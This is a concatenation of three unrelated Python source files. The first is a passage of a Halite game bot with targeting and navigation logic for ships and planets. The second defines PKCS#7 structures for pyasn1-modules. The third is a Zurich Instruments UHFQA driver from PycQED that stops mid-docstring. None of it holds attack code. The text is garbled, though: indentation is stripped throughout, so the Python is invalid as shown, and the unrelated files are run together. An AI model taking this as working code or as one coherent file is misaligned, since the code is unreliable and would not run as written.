intthrust.values * np.sin(np.deg2rad(intangle.values))])
if len(self.member_ids)>1:
if compute_distance_matrix((orig + shift), (orig + shift)).flat[[1, 2, 5][:len(self.member_ids)]].min() <= 2 * 0.5 + self.fudge:
continue
if True or ((orig + shift).reset_index(drop=True).corrwith(formation)).min() >= self.accuracy: #FIXME
found = True
intangle = intangle % 360
break
if found:
command_queue = [('t', *x) for x in zip(orig.index, intthrust, intangle)]
return [' '.join(str(x) for x in command) for command in command_queue]
else:
return []
class Bot:
def __init__(self, game, **overrides):
self.game = game
self.map = game.map
self.my_id = self.map.my_id
self.num_players = len(self.map.all_players())
# Tunable target penalties (I need to fit these...)
self.DOCKABLE_PLANET_PENALTY = 0.0 # except this should probably stay zero
# self.MAX_COLLISION_DISTANCE = 7*13
self.MAX_COLLISION_DISTANCE = 14
self.THREAT_CUTOFF = 30
self.DEFENDER_DISTANCE = 3.0
if self.num_players == 2:
self.ENEMY_SHIP_PENALTY = -20.0 #-40
self.LOW_HP_ENEMY_SHIP_PENALTY = -5.0
self.D_CENTER_PENALTY = 0.01
self.DEFENSE_PENALTY = -45.0
else:
self.ENEMY_SHIP_PENALTY = -10.0 # or a function of player strength in current frame? maybe should be positive for 4p?
self.LOW_HP_ENEMY_SHIP_PENALTY = -5.0
self.D_CENTER_PENALTY = -1 / 3 # minus one unit penalty for three units distance from center
self.DEFENSE_PENALTY = -45.0
self.__dict__.update(**overrides)
self.ships = pd.DataFrame(columns=['docked', 'enemy', 'health', 'x', 'y', 'dx', 'dy', 'dhealth'])
self.turn_count = 0
self.update(self.map)
def passed_time_limit(self):
return (time() - self.start_of_turn) > TIME_LIMIT
def update(self, map):
self.start_of_turn = time()
self.map = map
self.turn_count += 1
# Ships (computing dx, dy, and dhealth might be a waste of time, ideally the strategy should not depend on that)
ships = self.map._all_ships()
ids = pd.Index([s.id for s in ships], name='id')
try:
old = self.ships.loc[ids]
old.index = ids
except:
old = self.ships
self.ships = pd.DataFrame(dict(
enemy=[s.owner.id != self.my_id for s in ships],
x=[s.x for s in ships],
y=[s.y for s in ships],
health=[s.health for s in ships],
docked=[s.docking_status.value != 0 for s in ships]
), index=ids)
self.full_docked = pd.Series([s.docking_status.value==2 for s in ships], index=ids)
self.ships['dx'] = self.ships.x - old.x
self.ships['dy'] = self.ships.y - old.y
self.ships['dhealth'] = self.ships.health - old.health
self.ships.fillna(0.0, inplace=True)
self.ships.sort_index(inplace=True)
# Planets
planets = self.map.all_planets()
ids = pd.Index([p.id for p in planets], name='id')
self.planets = pd.DataFrame(dict(
docks=[(p.num_docking_spots - len(p._docked_ship_ids)) if (p.owner is None or p.owner.id == self.my_id) else 0 for p in planets],
x=[p.x for p in planets],
y=[p.y for p in planets],
radius=[p.radius for p in planets],
prod=[self.full_docked.loc[p._docked_ship_ids].sum() for p in planets],
owner_id=[p.owner.id if p.owner is not None else -1 for p in planets],
), index=ids)
if not hasattr(self, 'ship_turns_till_spawn'):
self.ship_turns_till_spawn = pd.Series(12, index=self.planets.index, name='ship_turns_till_spawn')
self.ship_turns_till_spawn[self.ship_turns_till_spawn <= 0] = 12
self.ship_turns_till_spawn = self.ship_turns_till_spawn.loc[self.planets.index]
self.ship_turns_till_spawn -= self.planets['prod']
self.ship_turns_till_spawn = (self.planets['owner_id'] == self.my_id) * self.ship_turns_till_spawn + (
self.planets[
'owner_id'] != self.my_id) * 12
self.planets['turns_till_spawn'] = np.ceil(self.ship_turns_till_spawn / np.clip(self.planets['prod'], 0.001, None))
obstacles = self.ships[self.ships.docked & ~self.ships.enemy][['x', 'y']].assign(type='dock', radius=hlt.constants.SHIP_RADIUS)
obstacles = obstacles.append(self.planets[['x','y','radius']].assign(type='planet'), ignore_index=True)
self.obstacles = obstacles
if self.turn_count < 2:
if self.num_players != 2:
self.rush = False
else:
enemy_pos = self.ships[self.ships.enemy][['x','y']].mean()
my_pos = self.ships[~self.ships.enemy][['x', 'y']].mean()
v = enemy_pos - my_pos
if np.sqrt(np.square(v.x) + np.square(v.y)) < 120:
self.rush = True
else:
self.rush = False
def kamikaze(self, worker, target):
angle = int(round(np.rad2deg(np.arctan2(target.y - worker.y, target.x - worker.x))))
thrust = hlt.constants.MAX_SPEED
self.command_queue.append(('t', worker.name, thrust, angle % 360))
self.workers.drop(worker.name, inplace=True)
def special_moves(self):
        # low hp kamikaze
kamikaze_workers = self.workers[(self.workers.health < 128) | (np.abs(self.workers.health / self.workers.dhealth) < 2)]
enemy_ships = self.ships[self.ships.enemy]
d = compute_distance_matrix(kamikaze_workers, enemy_ships)
sindex, tindex = np.indices(d.shape)
for _ in range(len(kamikaze_workers)):
if np.min(d) > hlt.constants.MAX_SPEED:
break
fi = np.argmin(d)
wi = sindex.flat[fi]
ti = tindex.flat[fi]
d[wi, :] = np.inf
d[:, ti] = np.inf
self.kamikaze(kamikaze_workers.iloc[wi], enemy_ships.iloc[ti])
# Other ideas:
# clumping to squads
# special opening moves (including keeping defense reserve)
# en route dodging # TODO put overlapping enemy attack zones in as obstacles
def get_targets(self):
# +0.0 each open dock
targets = list()
for pid, target in self.planets.drop('docks', axis=1).iterrows():
for _ in range(self.planets.docks.loc[pid]):
targets.append(target) # to_dict?
targets = pd.DataFrame(targets)
targets['type'] = 'open_dock'
# -30.0 enemy docks
enemy_docks = self.ships[self.ships.enemy & self.ships.docked][['x', 'y']]
enemy_docks['type'] = 'enemy_dock'
enemy_docks['radius'] = hlt.constants.SHIP_RADIUS
targets = pd.concat([targets,enemy_docks])
# -45.0 position between my dock and nearest enemy if nearest enemy is less than 30 and inbound (or less than 5 stationary) (based on threat ship count, not dock count)
threats = self.ships[self.ships.enemy & ~self.ships.docked]
my_docks = self.ships[~self.ships.enemy & self.ships.docked]
if len(threats) and len(my_docks):
dx = threats.x.values[None] - my_docks.x.values[:, None]
dy = threats.y.values[None] - my_docks.y.values[:, None]
d = np.sqrt(np.square(dx) + np.square(dy))
mask = (d < self.THREAT_CUTOFF).any(axis=0)
targeted_docks = my_docks.iloc[d.argmin(axis=0)]
targeted_docks = targeted_docks[mask]
threats = threats[mask]
if len(threats):
defense_targets = targeted_docks[['x', 'y']] + self.DEFENDER_DISTANCE * (
threats[['x', 'y']].values - targeted_docks[['x', 'y']].values) /d.min(axis=0)[mask.nonzero()[0],None]
defense_targets['radius'] = 0.0
defense_targets['type'] = 'defense'
targets = pd.concat([targets, defense_targets])
return pd.DataFrame(targets)
def send_to(self, wi, ti, min_distance=3.0, smash=False):
worker = self.workers.iloc[wi]
target = self.targets.iloc[ti]
if target['type'] == 'open_dock' and self.line_distances[wi, ti] < hlt.constants.DOCK_RADIUS:
self.command_queue.append(('d', worker.name, target.name))
if worker.name >= 0:
self.obstacles = self.obstacles.append(dict(x=worker.x, y=worker.y, radius=worker.radius, type='dock'), ignore_index=True)
return True
else:
if smash or target['type'] == 'defense':
min_distance = 0.0
d = round(min(self.line_distances[wi, ti] - min_distance, self.MAX_COLLISION_DISTANCE))
rads = self.find_clear_rads(target, worker, d)
if len(rads):
angle = int(round(np.rad2deg(rads[0])))
thrust = hlt.constants.MAX_SPEED if smash else int(round(min(d, hlt.constants.MAX_SPEED)))
thrust = max(0, thrust)
for cmd in self.command_queue:
assert cmd[1] != worker.name
self.command_queue.append(('t', worker.name, thrust, angle % 360))
if worker.name >= 0:
# add mid point obstacle # would higher res or better logic here be a significant improvement?
# x = worker.x + np.cos(rads[0]) * thrust/2
# y = worker.y + np.sin(rads[0]) * thrust/2
# self.obstacles = self.obstacles.append(dict(x=x, y=y, radius=thrust/2 + worker.radius, type='ship'), ignore_index=True)
#FIXME, testing end-only obstacles
x = worker.x + np.cos(rads[0]) * thrust
y = worker.y + np.sin(rads[0]) * thrust
self.obstacles = self.obstacles.append(dict(x=x, y=y, radius=worker.radius, type='ship'), ignore_index=True)
return True
else:
return False
def find_clear_rads(self, target, worker, d):
obstacles = self.obstacles.copy()
obstacles = obstacles[np.sqrt(np.square(obstacles.x - worker.x) + np.square(obstacles.y - worker.y)) - obstacles.radius - worker.radius <= d]
rads = (np.arctan2(target.y - worker.y, target.x - worker.x) + nav_rads)
ex = worker.x + np.cos(rads) * d
ey = worker.y + np.sin(rads) * d
for _, obstacle in obstacles.iterrows():
mask = ~intersect_segment_circle(worker, ex, ey, obstacle)
rads = rads[mask]
ex = ex[mask]
ey = ey[mask]
return rads
def update_penalties(self, wi, ti):
        # Update distances here (could add penalty updates based on map and/or command_queue, e.g. additional logic)
self.distances[wi, :] = np.inf
self.distances[:, ti] += 1000
def compute_distances(self):
# Compute distances (this could be updated with expected path distance)
dx = self.targets.x.values[None] - self.workers.x.values[:, None]
dy = self.targets.y.values[None] - self.workers.y.values[:, None]
self.line_distances = np.sqrt(np.square(dx) + np.square(dy)) - self.targets.radius.values # shouldn't need to account for ship radius
self.distances = self.line_distances.copy()
def apply_distance_penalties(self):
# for name, penalty in TYPE_PENALTY.items():
# self.distances[:, (self.targets['type'] == name).values] += penalty
self.distances[:, (self.targets['type'] == 'enemy_dock').values] += np.where(self.workers.health.values[:, None] >= 128, self.ENEMY_SHIP_PENALTY, self.LOW_HP_ENEMY_SHIP_PENALTY)
self.distances[:, (self.targets['type'] == 'defense').values] += self.DEFENSE_PENALTY * (self.workers.health.values[:, None]/255)
self.distances[self.workers.index.values < 0, :] += np.clip(7 * self.turns_till_spawn.values - 6.0, 0.0, None)[:, None]
d_center = np.sqrt(np.square(self.targets.x.values - self.map.width/2) + np.square(self.targets.y.values - self.map.height/2))
self.distances += self.D_CENTER_PENALTY * d_center
def get_rush_commands(self):
global nav_angles,nav_rads
if not hasattr(self, 'squad'):
nav_angles = np.array([-np.array(list(range(0, 175, 1))),
1 + np.array(list(range(0, 175, 1)))]).T.flatten()
nav_rads = np.deg2rad(nav_angles)
self.squad = Squad(self.ships[~self.ships.enemy].sort_values('y', ascending=False).index, scale=max(1.25, 8.5 - self.turn_count**2))
else:
# ordering = self.squad.ordering
self.squad = Squad(self.ships[~self.ships.enemy].sort_values('y', ascending=False).index, scale=max(1.25, 8.5 - self.turn_count**2))
# self.squad.ordering = ordering
pos = self.ships.loc[self.squad.member_ids][['x','y']].mean()
enemy_ships = self.ships[self.ships.enemy]
target = enemy_ships.iloc[np.argmin(np.sqrt(np.square(pos.x - enemy_ships.x.values) + np.square(pos.y-enemy_ships.y.values)))]
return self.squad.move(self, target.x, target.y)
def get_commands(self):
self.command_queue = []
if self.rush:
return self.get_rush_commands()
self.targets = self.get_targets() # df with x,y,type,radius
self.workers = self.ships[~(self.ships.enemy | self.ships.docked)]
self.special_moves() # warning, removes workers
unspawned_workers = self.planets[(self.planets.owner_id == self.my_id)].copy()
unspawned_workers.index = -(unspawned_workers.index + 1) # have negative ids
unspawned_workers['docked'] = False
unspawned_workers['enemy'] = False
unspawned_workers['health'] = 255
unspawned_workers['dx'] = 0.0
unspawned_workers['dy'] = 0.0
unspawned_workers['dhealth'] = 0.0
from_center = unspawned_workers[['x', 'y']] - np.array([self.map.width / 2, self.map.height / 2])
from_center = (
from_center.values / np.sqrt(np.square(from_center.x.values) + np.square(from_center.y.values))[:, None])
unspawned_workers[['x', 'y']] = unspawned_workers[['x', 'y']] - (
unspawned_workers.radius.values + hlt.constants.SPAWN_RADIUS)[
:, None] * from_center
self.turns_till_spawn = unspawned_workers.turns_till_spawn
self.workers = self.workers.append(unspawned_workers[self.workers.columns])
self.workers['radius'] = hlt.constants.SHIP_RADIUS
self.compute_distances() # workers X targets
self.apply_distance_penalties()
sindex, tindex = np.indices(self.distances.shape)
for _ in range(len(self.workers)):
if self.passed_time_limit() or len(self.targets) == 0 or len(self.workers) == 0:
break
fi = np.argmin(self.distances)
wi = sindex.flat[fi]
ti = tindex.flat[fi]
self.update_penalties(wi, ti)
self.send_to(wi, ti)
self.command_queue = [x for x in self.command_queue if x[1] >= 0] # filter unspawned
return [' '.join(str(x) for x in command) for command in self.command_queue]
if __name__ == '__main__':
debug = False
bot_name = 'MyBot'
game = hlt.Game(bot_name)
if not debug:
sys.stderr = open(os.devnull, mode='w') # prevent warning messages from breaking bot
bot = Bot(game)
while True:
game_map = game.update_map()
bot.update(game_map)
command_queue = bot.get_commands()
game.send_command_queue(command_queue)
else:
import pickle
bot = Bot(game)
turn_count =0
with open('{}.{}.pkl'.format(bot_name,turn_count), mode='wb') as file:
pickle.dump(bot, file)
while True:
turn_count += 1
game_map = game.update_map()
try:
bot.update(game_map)
command_queue = bot.get_commands()
with open('{}.{}.pkl'.format(bot_name,turn_count), mode='wb') as file:
pickle.dump(bot, file)
except Exception as e:
with open('{}.err.pkl'.format(bot_name), mode='wb') as file:
pickle.dump(bot, file)
raise e
game.send_command_queue(command_queue)
|
|
#
# This file is part of pyasn1-modules software.
#
# Copyright (c) 2005-2017, Ilya Etingof <etingof@gmail.com>
# License: http://pyasn1.sf.net/license.html
#
# PKCS#7 message syntax
#
# ASN.1 source from:
# https://opensource.apple.com/source/Security/Security-55179.1/libsecurity_asn1/asn1/pkcs7.asn.auto.html
#
# Sample captures from:
# openssl crl2pkcs7 -nocrl -certfile cert1.cer -out outfile.p7b
#
from pyasn1_modules.rfc2459 import *
class Attribute(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('type', AttributeType()),
namedtype.NamedType('values', univ.SetOf(componentType=AttributeValue()))
)
class AttributeValueAssertion(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('attributeType', AttributeType()),
namedtype.NamedType('attributeValue', AttributeValue())
)
pkcs_7 = univ.ObjectIdentifier('1.2.840.113549.1.7')
data = univ.ObjectIdentifier('1.2.840.113549.1.7.1')
signedData = univ.ObjectIdentifier('1.2.840.113549.1.7.2')
envelopedData = univ.ObjectIdentifier('1.2.840.113549.1.7.3')
signedAndEnvelopedData = univ.ObjectIdentifier('1.2.840.113549.1.7.4')
digestedData = univ.ObjectIdentifier('1.2.840.113549.1.7.5')
encryptedData = univ.ObjectIdentifier('1.2.840.113549.1.7.6')
class ContentType(univ.ObjectIdentifier):
pass
class ContentEncryptionAlgorithmIdentifier(AlgorithmIdentifier):
pass
class EncryptedContent(univ.OctetString):
pass
class EncryptedContentInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('contentType', ContentType()),
namedtype.NamedType('contentEncryptionAlgorithm', ContentEncryptionAlgorithmIdentifier()),
namedtype.OptionalNamedType('encryptedContent', EncryptedContent().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class Version(univ.Integer): # overrides x509.Version
pass
class EncryptedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('encryptedContentInfo', EncryptedContentInfo())
)
class DigestAlgorithmIdentifier(AlgorithmIdentifier):
pass
class DigestAlgorithmIdentifiers(univ.SetOf):
componentType = DigestAlgorithmIdentifier()
class Digest(univ.OctetString):
pass
class ContentInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('contentType', ContentType()),
namedtype.OptionalNamedType('content', univ.Any().subtype(
explicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class DigestedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('digestAlgorithm', DigestAlgorithmIdentifier()),
namedtype.NamedType('contentInfo', ContentInfo()),
namedtype.NamedType('digest', Digest())
)
class IssuerAndSerialNumber(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('serialNumber', CertificateSerialNumber())
)
class KeyEncryptionAlgorithmIdentifier(AlgorithmIdentifier):
pass
class EncryptedKey(univ.OctetString):
pass
class RecipientInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('issuerAndSerialNumber', IssuerAndSerialNumber()),
namedtype.NamedType('keyEncryptionAlgorithm', KeyEncryptionAlgorithmIdentifier()),
namedtype.NamedType('encryptedKey', EncryptedKey())
)
class RecipientInfos(univ.SetOf):
componentType = RecipientInfo()
class Attributes(univ.SetOf):
componentType = Attribute()
class ExtendedCertificateInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('certificate', Certificate()),
namedtype.NamedType('attributes', Attributes())
)
class SignatureAlgorithmIdentifier(AlgorithmIdentifier):
pass
class Signature(univ.BitString):
pass
class ExtendedCertificate(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('extendedCertificateInfo', ExtendedCertificateInfo()),
namedtype.NamedType('signatureAlgorithm', SignatureAlgorithmIdentifier()),
namedtype.NamedType('signature', Signature())
)
class ExtendedCertificateOrCertificate(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('certificate', Certificate()),
namedtype.NamedType('extendedCertificate', ExtendedCertificate().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0)))
)
class ExtendedCertificatesAndCertificates(univ.SetOf):
componentType = ExtendedCertificateOrCertificate()
class SerialNumber(univ.Integer):
pass
class CRLEntry(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('userCertificate', SerialNumber()),
namedtype.NamedType('revocationDate', useful.UTCTime())
)
class TBSCertificateRevocationList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('signature', AlgorithmIdentifier()),
namedtype.NamedType('issuer', Name()),
namedtype.NamedType('lastUpdate', useful.UTCTime()),
namedtype.NamedType('nextUpdate', useful.UTCTime()),
namedtype.OptionalNamedType('revokedCertificates', univ.SequenceOf(componentType=CRLEntry()))
)
class CertificateRevocationList(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('tbsCertificateRevocationList', TBSCertificateRevocationList()),
namedtype.NamedType('signatureAlgorithm', AlgorithmIdentifier()),
namedtype.NamedType('signature', univ.BitString())
)
class CertificateRevocationLists(univ.SetOf):
componentType = CertificateRevocationList()
class DigestEncryptionAlgorithmIdentifier(AlgorithmIdentifier):
pass
class EncryptedDigest(univ.OctetString):
pass
class SignerInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('issuerAndSerialNumber', IssuerAndSerialNumber()),
namedtype.NamedType('digestAlgorithm', DigestAlgorithmIdentifier()),
namedtype.OptionalNamedType('authenticatedAttributes', Attributes().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.NamedType('digestEncryptionAlgorithm', DigestEncryptionAlgorithmIdentifier()),
namedtype.NamedType('encryptedDigest', EncryptedDigest()),
namedtype.OptionalNamedType('unauthenticatedAttributes', Attributes().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1)))
)
class SignerInfos(univ.SetOf):
componentType = SignerInfo()
class SignedAndEnvelopedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('recipientInfos', RecipientInfos()),
namedtype.NamedType('digestAlgorithms', DigestAlgorithmIdentifiers()),
namedtype.NamedType('encryptedContentInfo', EncryptedContentInfo()),
namedtype.OptionalNamedType('certificates', ExtendedCertificatesAndCertificates().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('crls', CertificateRevocationLists().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.NamedType('signerInfos', SignerInfos())
)
class EnvelopedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('recipientInfos', RecipientInfos()),
namedtype.NamedType('encryptedContentInfo', EncryptedContentInfo())
)
class DigestInfo(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('digestAlgorithm', DigestAlgorithmIdentifier()),
namedtype.NamedType('digest', Digest())
)
class SignedData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('version', Version()),
namedtype.NamedType('digestAlgorithms', DigestAlgorithmIdentifiers()),
namedtype.NamedType('contentInfo', ContentInfo()),
namedtype.OptionalNamedType('certificates', ExtendedCertificatesAndCertificates().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 0))),
namedtype.OptionalNamedType('crls', CertificateRevocationLists().subtype(
implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed, 1))),
namedtype.NamedType('signerInfos', SignerInfos())
)
class Data(univ.OctetString):
pass
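# Illustrative sketch only (not part of the original module): decoding a DER
# encoded PKCS#7 blob (e.g. the output of the openssl command in the header
# comment) into the ContentInfo structure defined above. Assumes the pyasn1
# DER decoder is available.
def _example_decode_content_info(substrate):
    from pyasn1.codec.der import decoder
    content_info, rest = decoder.decode(substrate, asn1Spec=ContentInfo())
    assert not rest
    return content_info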
|
|
"""
Base driver for the UHFQA instrument including all common functionality.
Application dependent code can be found in the UHFQuantumController and in the
UHFQA_qudev modules.
"""
import time
import logging
import numpy as np
import pycqed.instrument_drivers.physical_instruments.ZurichInstruments.ZI_base_instrument as zibase
from pycqed.utilities.general import check_keyboard_interrupt
from qcodes.utils import validators
from qcodes.instrument.parameter import ManualParameter
log = logging.getLogger(__name__)
##########################################################################
# Exceptions
##########################################################################
class ziUHFQCSeqCError(Exception):
"""Exception raised when the configured SeqC program does
not match the structure needed for a given measurement in terms
of number of samples, number of averages or the use of a delay."""
pass
class ziUHFQCHoldoffError(Exception):
"""Exception raised when a holdoff error has occurred in either the
input monitor or result logging unit. Increase the delay between triggers
sent to these units to solve the problem."""
pass
class ziUHFQCDIOActivityError(Exception):
"""Exception raised when insufficient activity is detected on the bits
of the DIO to be used for controlling which qubits to measure."""
pass
class ziUHFQCDIOCalibrationError(Exception):
"""Exception raised when the DIO calibration fails, meaning no signal
delay can be found where no timing violations are detected."""
pass
##########################################################################
# Class
##########################################################################
class UHFQA_core(zibase.ZI_base_instrument):
"""
This is the base PycQED driver for the 1.8 Gsample/s UHFQA developed
    by Zurich Instruments. The class implements functionality that is used
    by both the DCL and QuDev versions of the UHFQA driver.
Requirements:
Installation instructions for Zurich Instrument Libraries.
1. install ziPython 3.5/3.6 ucs4 19.05 for 64bit Windows from
http://www.zhinst.com/downloads, https://people.zhinst.com/~niels/
2. upload the latest firmware to the UHFQA using the LabOne GUI
"""
# Define minimum required revisions
MIN_FWREVISION = 63210
MIN_FPGAREVISION = 63133
# Define user registers
USER_REG_LOOP_CNT = 0
USER_REG_RO_MODE = 1
USER_REG_WAIT_DLY = 2
USER_REG_AVG_CNT = 3
USER_REG_ERR_CNT = 4
def __init__(self,
name,
device: str,
interface: str = 'USB',
address: str = '127.0.0.1',
port: int = 8004,
nr_integration_channels: int = 10,
server: str = '',
**kw) -> None:
"""
Input arguments:
name: (str) name of the instrument
device (str) the name of the device e.g., "dev8008"
interface (str) the name of the interface to use ('1GbE' or 'USB')
address (str) the host where the ziDataServer is running (for compatibility)
port (int) the port to connect to for the ziDataServer (don't change)
nr_integration_channels (int) the number of integration channels to use (max 10)
server: (str) the host where the ziDataServer is running (if not '' then used instead of address)
"""
t0 = time.time()
# Override server with the old-style address argument
if server == '':
server = address
# save some parameters
self._nr_integration_channels = nr_integration_channels
# Used for keeping track of which nodes we are monitoring for data
self._acquisition_nodes = []
# The following members define the characteristics of the configured
# AWG program
self._reset_awg_program_features()
# Define parameters that should not be part of the snapshot
self._params_to_exclude = set(['features_code', 'system_fwlog', 'system_fwlogenable'])
        # Set default waveform length to 32 samples (~17.8 ns at 1.8 GSa/s)
self._default_waveform_length = 32
# Our base class includes all the functionality needed to initialize the parameters
# of the object. Those parameters are read from instrument-specific JSON files stored
# in the zi_parameter_files folder.
super().__init__(name=name, device=device, interface=interface,
server=server, port=port, num_codewords=2**nr_integration_channels,
**kw)
t1 = time.time()
log.info(f'{self.devname}: Initialized UHFQA_core in {t1 - t0:.3f}s')
##########################################################################
# Overriding private ZI_base_instrument methods
##########################################################################
def _check_devtype(self) -> None:
if self.devtype != 'UHFQA':
raise zibase.ziDeviceError(
'Device {} of type {} is not a UHFQA instrument!'.format(self.devname, self.devtype))
def _check_options(self) -> None:
"""
Checks that the correct options are installed on the instrument.
"""
options = self.gets('features/options').split('\n')
if 'QA' not in options and 'QC' not in options:
raise zibase.ziOptionsError(
'Device {} is missing the QA or QC option!'.format(self.devname))
if 'AWG' not in options:
raise zibase.ziOptionsError(
'Device {} is missing the AWG option!'.format(self.devname))
def _check_versions(self) -> None:
"""
Checks that sufficient versions of the firmware are available.
"""
if self.geti('system/fwrevision') < UHFQA_core.MIN_FWREVISION:
raise zibase.ziVersionError('Insufficient firmware revision detected! Need {}, got {}!'.format(
UHFQA_core.MIN_FWREVISION, self.geti('system/fwrevision')))
if self.geti('system/fpgarevision') < UHFQA_core.MIN_FPGAREVISION:
raise zibase.ziVersionError('Insufficient FPGA revision detected! Need {}, got {}!'.format(
UHFQA_core.MIN_FPGAREVISION, self.geti('system/fpgarevision')))
def _check_awg_nr(self, awg_nr) -> None:
"""
Checks that the given AWG index is valid for the device.
"""
if (awg_nr != 0):
raise zibase.ziValueError(
'Invalid AWG index of {} detected!'.format(awg_nr))
def _num_channels(self) -> int:
return 2
def _add_extra_parameters(self) -> None:
"""
We add a few additional custom parameters on top of the ones defined in the device files. These are:
qas_0_trans_offset_weightfunction - an offset correction parameter for all weight functions,
this allows normalized calibration when performing cross-talk suppressed readout. The parameter
is not actually used in this driver, but in some of the support classes that make use of the driver.
"""
super()._add_extra_parameters()
# storing an offset correction parameter for all weight functions,
# this allows normalized calibration when performing cross-talk suppressed
# readout
for i in range(self._nr_integration_channels):
self.add_parameter(
"qas_0_trans_offset_weightfunction_{}".format(i),
unit='', # unit is adc value
label='RO normalization offset',
initial_value=0.0,
docstring='an offset correction parameter for all weight functions, '
'this allows normalized calibration when performing cross-talk suppressed readout. The parameter '
'is not actually used in this driver, but in some of the support classes that make use of the driver.',
parameter_class=ManualParameter)
self.add_parameter(
'wait_dly',
set_cmd=self._set_wait_dly,
get_cmd=self._get_wait_dly,
unit='',
label='AWG cycle delay',
            docstring='Configures a delay in AWG clock cycles (4.44 ns) to be '
'applied between when the AWG starts playing the readout waveform, and when it triggers the '
'actual readout.',
vals=validators.Ints())
self.add_parameter(
'minimum_holdoff',
get_cmd=self._get_minimum_holdoff,
unit='s',
label='Minimum hold-off',
docstring='Returns the minimum allowed hold-off between two readout operations.',
vals=validators.Numbers())
##########################################################################
# 'public' overrides for ZI_base_instrument
##########################################################################
def assure_ext_clock(self) -> None:
"""
Make sure the instrument is using an external reference clock
"""
# get source:
# 1: external
# 0: internal (commanded so, or because of failure to sync to external clock)
source = self.system_extclk()
if source == 1:
return
log.info(f"{self.devname}: Switching to external clock.")
while True:
self.system_extclk(1)
timeout = 10
while timeout > 0:
time.sleep(0.1)
status = self.system_extclk()
if status == 1: # synced
break
else: # sync failed
timeout -= 0.1
if self.system_extclk() != 1:
log.warning(f"{self.devname}: Switching to external clock failed. Trying again.")
else:
break
log.info(f"{self.devname}: Switching to external clock done.")
def clear_errors(self) -> None:
super().clear_errors()
self.qas_0_result_reset(1)
self.qas_0_monitor_reset(1)
def load_default_settings(self) -> None:
# standard configurations adapted from Haandbaek's notebook
# Setting the clock to external
self.assure_ext_clock()
# Turn on both outputs
self.sigouts_0_on(1)
self.sigouts_1_on(1)
# Set the output channels to 50 ohm
self.sigouts_0_imp50(True)
self.sigouts_1_imp50(True)
# Configure the analog trigger input 1 of the AWG to assert on a rising
# edge on Ref_Trigger 1 (front-panel of the instrument)
self.awgs_0_triggers_0_rising(1)
self.awgs_0_triggers_0_level(0.000000000)
self.awgs_0_triggers_0_channel(2)
# Configure the digital trigger to be a rising-edge trigger
self.awgs_0_auxtriggers_0_slope(1)
# Straight connection, signal input 1 to channel 1, signal input 2 to
# channel 2
self.qas_0_deskew_rows_0_cols_0(1.0)
self.qas_0_deskew_rows_0_cols_1(0.0)
self.qas_0_deskew_rows_1_cols_0(0.0)
self.qas_0_deskew_rows_1_cols_1(1.0)
        # Configure the result logger defaults; note these (length 1000, 2^10
        # averages) are overwritten by acquisition_initialize() before a measurement
self.qas_0_result_length(1000)
self.qas_0_result_averages(pow(2, 10))
# result_logging_mode 2 => raw (IQ)
self.qas_0_result_source(2) # FIXME: not documented in "node_doc_UHFQA.json"
self.reset_acquisition_params()
# The custom firmware will feed through the signals on Signal Input 1 to Signal Output 1 and Signal Input 2 to Signal Output 2
# when the AWG is OFF. For most practical applications this is not really useful. We, therefore, disable the generation of
# these signals on the output here.
self.sigouts_0_enables_0(0)
self.sigouts_0_enables_1(0)
self.sigouts_1_enables_0(0)
self.sigouts_1_enables_1(0)
##########################################################################
# 'public' functions
##########################################################################
def clock_freq(self):
return 1.8e9
##########################################################################
# 'public' functions: utility
##########################################################################
def reset_acquisition_params(self):
log.info(f'{self.devname}: Setting user registers to 0')
for i in range(16):
self.set('awgs_0_userregs_{}'.format(i), 0)
self.reset_crosstalk_matrix()
self.reset_correlation_params()
self.reset_rotation_params()
def reset_crosstalk_matrix(self):
self.upload_crosstalk_matrix(np.eye(self._nr_integration_channels))
def reset_correlation_params(self):
for i in range(self._nr_integration_channels):
self.set('qas_0_correlations_{}_enable'.format(i), 0)
self.set('qas_0_correlations_{}_source'.format(i), 0)
self.set('qas_0_thresholds_{}_correlation_enable'.format(i), 0)
self.set('qas_0_thresholds_{}_correlation_source'.format(i), 0)
def reset_rotation_params(self):
for i in range(self._nr_integration_channels):
self.set('qas_0_rotations_{}'.format(i), 1+1j)
def upload_crosstalk_matrix(self, matrix) -> None:
"""
Upload parameters for the 10*10 crosstalk suppression matrix.
